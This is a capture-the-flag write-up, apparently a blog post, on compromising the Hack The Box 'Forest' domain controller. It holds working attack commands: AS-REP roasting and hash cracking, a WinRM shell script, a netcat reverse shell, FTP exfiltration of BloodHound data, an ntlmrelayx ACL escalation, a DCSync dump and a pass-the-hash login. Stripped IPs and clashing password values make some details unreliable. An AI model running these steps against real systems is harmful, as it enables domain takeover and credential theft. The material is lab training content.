Hackthebox – Forest

As with any machine, I started with a port scan

root@kalivm:~/Forest# nmap -sTV -p 1-65535 -oN fullscan_tcp
Starting Nmap 7.80 (https://nmap.org ) at 2019-10-25 11:47 CET
Nmap scan report for
Host is up (0.016s latency).
Not shown: 65511 closed ports
53/tcp    open  domain?
88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2019-10-21 09:54:20Z)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds (workgroup: HTB)
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp  open  mc-nmf       .NET Message Framing
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49671/tcp open  msrpc        Microsoft Windows RPC
49674/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49675/tcp open  msrpc        Microsoft Windows RPC
49682/tcp open  msrpc        Microsoft Windows RPC
49701/tcp open  msrpc        Microsoft Windows RPC
49913/tcp open  msrpc        Microsoft Windows RPC
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 162.07 seconds

There are already several interesting things in this result. First of all, this a domain-connected system to the HTB.local domain. It has kerberos, ldap adn SMB services exposed to the outside world and appears as if it is a domain controller. And last but not least, it has a WinRM port open. This could be an attack similar to the approach I used a long time ago for the ‘Active’ Machine on Hackthebox, combined with the winRM attack used on Heist!

Let’s first try enum4linux to see if I can enumerate some more information.

root@kalivm:~/Forest# enum4linux -a
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Fri Oct 25 12:04:13 2019
|    Target Information    |
Target ...........
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
|    Getting domain SID for    |
Domain Name: HTB
Domain Sid: S-1-5-21-3072663084-364016917-1341370565
[+] Host is part of a domain (not a workgroup)
|    Users on    |
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
user:[SM_75a538d3025e4db9a] rid:[0x466]
user:[SM_681f53d4942840e18] rid:[0x467]
user:[SM_1b41c9286325456bb] rid:[0x468]
user:[SM_9b69f1b9d2cc45549] rid:[0x469]
user:[SM_7c96b981967141ebb] rid:[0x46a]
user:[SM_c75ee099d0a64c91b] rid:[0x46b]
user:[SM_1ffab36a2f5f479cb] rid:[0x46c]
user:[HealthMailboxc3d7722] rid:[0x46e]
user:[HealthMailboxfc9daad] rid:[0x46f]
user:[HealthMailboxc0a90c9] rid:[0x470]
user:[HealthMailbox670628e] rid:[0x471]
user:[HealthMailbox968e74d] rid:[0x472]
user:[HealthMailbox6ded678] rid:[0x473]
user:[HealthMailbox83d6781] rid:[0x474]
user:[HealthMailboxfd87238] rid:[0x475]
user:[HealthMailboxb01ac64] rid:[0x476]
user:[HealthMailbox7108a4e] rid:[0x477]
user:[HealthMailbox0659cc1] rid:[0x478]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]
|    Password Policy Information for    |
[+] Attaching to using a NULL share
[+] Trying protocol 445/SMB...
[+] Found domain(s):
	[+] HTB
	[+] Builtin
[+] Password Info for Domain: HTB
	[+] Minimum password length: 7
	[+] Password history length: 24
	[+] Maximum password age: 41 days 23 hours 53 minutes 
	[+] Password Complexity Flags: 000000
		[+] Domain Refuse Password Change: 0
		[+] Domain Password Store Cleartext: 0
		[+] Domain Password Lockout Admins: 0
		[+] Domain Password No Clear Change: 0
		[+] Domain Password No Anon Change: 0
		[+] Domain Password Complex: 0
	[+] Minimum password age: 1 day 4 minutes 
	[+] Reset Account Lockout Counter: 30 minutes 
	[+] Locked Account Duration: 30 minutes 
	[+] Account Lockout Threshold: None
	[+] Forced Log off Time: Not Set
[+] Retieved partial password policy with rpcclient:
Password Complexity: Disabled
Minimum Password Length: 7
|    Groups on    |
[+] Getting domain groups:
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Domain Controllers] rid:[0x204]
group:[Schema Admins] rid:[0x206]
group:[Enterprise Admins] rid:[0x207]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Read-only Domain Controllers] rid:[0x209]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[Key Admins] rid:[0x20e]
group:[Enterprise Key Admins] rid:[0x20f]
group:[DnsUpdateProxy] rid:[0x44e]
group:[Organization Management] rid:[0x450]
group:[Recipient Management] rid:[0x451]
group:[View-Only Organization Management] rid:[0x452]
group:[Public Folder Management] rid:[0x453]
group:[UM Management] rid:[0x454]
group:[Help Desk] rid:[0x455]
group:[Records Management] rid:[0x456]
group:[Discovery Management] rid:[0x457]
group:[Server Management] rid:[0x458]
group:[Delegated Setup] rid:[0x459]
group:[Hygiene Management] rid:[0x45a]
group:[Compliance Management] rid:[0x45b]
group:[Security Reader] rid:[0x45c]
group:[Security Administrator] rid:[0x45d]
group:[Exchange Servers] rid:[0x45e]
group:[Exchange Trusted Subsystem] rid:[0x45f]
group:[Managed Availability Servers] rid:[0x460]
group:[Exchange Windows Permissions] rid:[0x461]
group:[ExchangeLegacyInterop] rid:[0x462]
group:[$D31000-NSEL5BRJ63V7] rid:[0x46d]
group:[Service Accounts] rid:[0x47c]
group:[Privileged IT Accounts] rid:[0x47d]
group:[test] rid:[0x13ed]
[+] Getting domain group memberships:
Group 'Enterprise Admins' (RID: 519) has member: HTB\Administrator
Group 'Privileged IT Accounts' (RID: 1149) has member: HTB\Service Accounts
Group 'Service Accounts' (RID: 1148) has member: HTB\svc-alfresco
Group 'Domain Controllers' (RID: 516) has member: HTB\FOREST$
Group 'Exchange Trusted Subsystem' (RID: 1119) has member: HTB\EXCH01$
enum4linux complete on Mon Oct 21 12:05:29 2019

Enum4linux provides a lot of interesting things. First of all I see that there are some users (sebastien,lucinda,andy,mark,santi) present and an apparent service account (svc-alfresco).
Furthermore there appears to be no password complexity enforced, which may mean easy-guessible/crackable passwords. There appears to be an Microsoft Exchange installation present which is commonly known to be a big security issue if it is not configured correct! And a last line confirms the hunch, Forest is actually part of the domain controlers group! So I started browsing through the impacket tools and tried various until I came up to the GetNPUsers.py tool.

root@kalivm:~/Forest# GetNPUsers.py -dc-ip -no-pass HTB/sebastien
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] Getting TGT for sebastien
[-] User sebastien doesn't have UF_DONT_REQUIRE_PREAUTH set
root@kalivm:~/Forest# GetNPUsers.py -dc-ip -no-pass HTB/lucinda
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] Getting TGT for lucinda
[-] User lucinda doesn't have UF_DONT_REQUIRE_PREAUTH set
root@kalivm:~/Forest# GetNPUsers.py -dc-ip -no-pass HTB/svc-alfresco
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] Getting TGT for svc-alfresco

After trying it for some users, I finally got a TGT for the user svc-alfresco which I could try to crack using hashcat.

[hashcat] $ hashcat -m 18200 -a 0 -w 3 forest.hash rockyou.txt
Dictionary cache hit:
* Filename..: rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

Session..........: hashcat
Status...........: Cracked
Hash.Type........: Kerberos 5 AS-REP etype 23
Hash.Target......: $krb5asrep$23$svc-alfresco@HTB:a886b951410cd0d9b804...a751ba
Time.Started.....: Fri Oct 25 12:37:07 2019 (1 sec)
Time.Estimated...: Fri Oct 25 12:37:08 2019 (0 secs)
Guess.Base.......: File (rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 13838.5 kH/s (13.64ms) @ Accel:1024 Loops:1 Thr:64 Vec:1
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 4587520/14344385 (31.98%)
Rejected.........: 0/4587520 (0.00%)
Restore.Point....: 3932160/14344385 (27.41%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: seaford123 -> pommiey4632@hotmail.com
Hardware.Mon.#1..: Temp: 41c Fan: 24% Util: 46% Core:1898MHz Mem:3802MHz Bus:16

So apparently Alfresco’s password is service. Next thing I did was modify the WinRM shell that I previously created for Hackthebox – Heist to contain the right username, password and IP address

require 'winrm'

conn = WinRM::Connection.new(
  endpoint: '',
  user: 'svc-alfresco',
  password: 's3rvice',


conn.shell(:powershell) do |shell|
    until command == "exit\n" do
        print "PS > "
        command = gets        
        output = shell.run(command) do |stdout, stderr|
            STDOUT.print stdout
            STDERR.print stderr
    puts "Exiting with code #{output.exitcode}"

and execute it in order to obtain shell access.

root@kalivm:~/Forest# ruby shell.rb 
PS > whoami

Now the only thing left to do, is obtain the user hash and start with privilege escalation

PS > type ..\Desktop\user.txt

Privilege Escalation

Next up is privilege escalation, after pressing CTRL-C for too many times, I decided it was time to have a simple fallback in place.

root@kalivm:~/Forest# ruby shell.rb
PS > mkdir sedje
PS > cd sedje
PS > IWR -uri -outfile nc.exe

PS > ./nc 9002 -e powershell.exe
So I restart my ruby WinRM shell again and transfer Netcat to the machine. I start a netcat connection back to my system while in another terminal, I have a listener waiting.
root@kalivm:~/Forest# nc -nvlp 9002
Listening on 9002
Connection received on 50030
Windows PowerShell 
Copyright (C) 2016 Microsoft Corporation. All rights reserved.

PS C:\Users\svc-alfresco\Documents\sedje>
PS C:\Users\svc-alfresco\Documents\sedje> IWR -uri -outfile SharpHound.ps1
PS C:\Users\svc-alfresco\Documents\sedje> IWR -uri -outfile SharpHound.exe
PS C:\Users\svc-alfresco\Documents\sedje> Import-Module .\SharpHound.ps1
PS C:\Users\svc-alfresco\Documents\sedje> Invoke-BloodHound -CollectionMethod All -LDAPUser svc-alfresco -LDAPPass s3rvice
PS C:\Users\svc-alfresco\Documents\sedje> dir

    Directory: C:\Users\svc-alfresco\Documents\sedje

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        10/25/2019   5:20 AM          12950 20191025120253_BloodHound.zip
-a----        10/25/2019   5:20 AM           9151 Rk9SRVNU.bin
-a----        10/25/2019   5:18 AM         751616 SharpHound.exe
-a----        10/25/2019   5:17 AM         886595 SharpHound.ps1
Once the SharpHound script and binary are transferred, I execute them with the svc-alfresco user and the script provides a zip file containing all relevant domain data. Now all that is left is transfer the file to my local machine and analyze it with BloodHound. The easiest and most used way I learned during my OSCP journey, was to simply create an FTP script and execute it.
PS C:\Users\svc-alfresco\Documents\sedje> echo "open" > ftp
PS C:\Users\svc-alfresco\Documents\sedje> echo "anonymous" >> ftp
PS C:\Users\svc-alfresco\Documents\sedje> echo "" >> ftp
PS C:\Users\svc-alfresco\Documents\sedje> echo "put 20191101052032_BloodHound.zip" >> ftp
PS C:\Users\svc-alfresco\Documents\sedje> echo "quit" >> ftp
PS C:\Users\svc-alfresco\Documents\sedje> ftp -s:ftp 
Log in with USER and PASS first.
User ( 
put 20191025120253_BloodHound.zip
Of course, this approach does require a running FTP server on my attacker machine which can be easily done with Python
root@kalivm:~/Forest# python -m pyftpdlib -p 21 -w
/usr/lib/python2.7/dist-packages/pyftpdlib/authorizers.py:244: RuntimeWarning: write permissions assigned to anonymous user.
[I 2019-10-25 13:15:13] >>> starting FTP server on, pid=5057 < <<
[I 2019-10-25 13:15:13] concurrency model: async
[I 2019-10-25 13:15:13] masquerade (NAT) address: None
[I 2019-10-25 13:15:13] passive ports: None
[I 2019-10-25 13:15:27][] FTP session opened (connect)
[I 2019-10-25 13:15:27][anonymous] USER 'anonymous' logged in.
[I 2019-10-25 13:15:27][anonymous] STOR /root/Documents/htb/Machines/Forest/20191025120253_BloodHound.zip completed=1 bytes=12950 seconds=0.07
[I 2019-10-25 13:15:27][anonymous] FTP session closed (disconnect).
So the file was successfully transferred and can be loaded instantly into BloodHound by simply dragging and dropping it. In the bloodhound overview of the shortest path to Domain Administrator, I see that a user who is part of the ‘Exchange Windows Permissions’ group, has the possibility to Write the ACL of the entire HTB.Local domain, and thereby obtain for instance the Password Hashes. I can also see that the user svc-alfresco has permissions GenericAll to that specific group through his delegated memberships of `Service Accounts`, `Privileged IT Accounts` and `Account Operators`.
PS C:\Users\svc-alfresco\Documents\sedje> IWR -uri -outfile Powerview.ps1
PS C:\Users\svc-alfresco\Documents\sedje> Import-Module .\PowerView.ps1
PS C:\Users\svc-alfresco\Documents\sedje> $SecPassword = ConvertTo-SecureString 's3rvice' -AsPlainText -Force
PS C:\Users\svc-alfresco\Documents\sedje> $Cred = New-Object System.Management.Automation.PSCredential('HTB\svc-alfresco', $SecPassword)
PS C:\Users\svc-alfresco\Documents\sedje> New-DomainUser -SamAccountName sedje -AccountPassword $SecPassword -Credential $Cred | Add-DomainGroupMember 'Exchange Windows Permissions' -Credential $Cred
However, when adding the svc-alfresco account to the `Exchange Windows Permissions` group, it gets removed after a few minutes again which is quite inconvenient. So I decide to add my own user to the domain with the same password as user svc-alfresco and add it to the `Exchange Windows Permissions` group. After that however, I got stuck for a long while due to the very specific syntax and switches required (and available) with the impacket tools. If it wasn’t for some users on Discord to help me, I would probably have given up eventually so I have to thank them for the nudge on the next step!
root@kalivm:~/Forest# ntlmrelayx.py --escalate-user sedje -t ldap://
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] Protocol Client SMB loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up HTTP Server

[*] Servers started, waiting for connections
Now all I have to do is browse to the localhost connection and provide valid credentials, NTLMRelay will do all the hard work and change the permissions for me. I open up a browser to localhost and provide the sedje credentials.
[*] HTTPD: Received connection from, attacking target ldap://
[*] HTTPD: Client requested path: /
[*] HTTPD: Client requested path: /
[*] HTTPD: Client requested path: /
[*] Authenticating against ldap:// as \sedje SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] User privileges found: Create user
[*] User privileges found: Modifying domain ACL
[*] Querying domain security descriptor
[*] Success! User sedje now has Replication-Get-Changes-All privileges on the domain
[*] Try using DCSync with secretsdump.py and this user :)
[*] Saved restore state to aclpwn-20191025-135738.restoresedsedss
And ntlmrelayx.py already tells me what I have to do, sedje now has the right privileges to continue with secretsdump.py.
root@kalivm:~/Forest# secretsdump.py htb/sedje:s3rvice@
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Use secretsdump.py to obtain all hashes in the domain
root@kalivm:~/Forest# psexec.py -hashes :32693b11e6aa90eb43d32c72a07ceea6 htb/administrator@ powershell.exe
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] Requesting shares on
[*] Found writable share ADMIN$
[*] Uploading file ezaVoayr.exe
[*] Opening SVCManager on
[*] Creating service CAke on
[*] Starting service CAke.....
[!] Press help for extra shell commands
Windows PowerShell 
Copyright (C) 2016 Microsoft Corporation. All rights reserved.

PS C:\Windows\system32> whoami
nt authority\system
Re-use the hash in a pass the hash attack
PS C:\Windows\system32> type c:\Users\Administrator\Desktop\root.txt
type c:\Users\Administrator\Desktop\root.txt
Re-use the hash in a pass the hash attack

Leave a Reply

Your email address will not be published.

This site uses Akismet to reduce spam. Learn how your comment data is processed.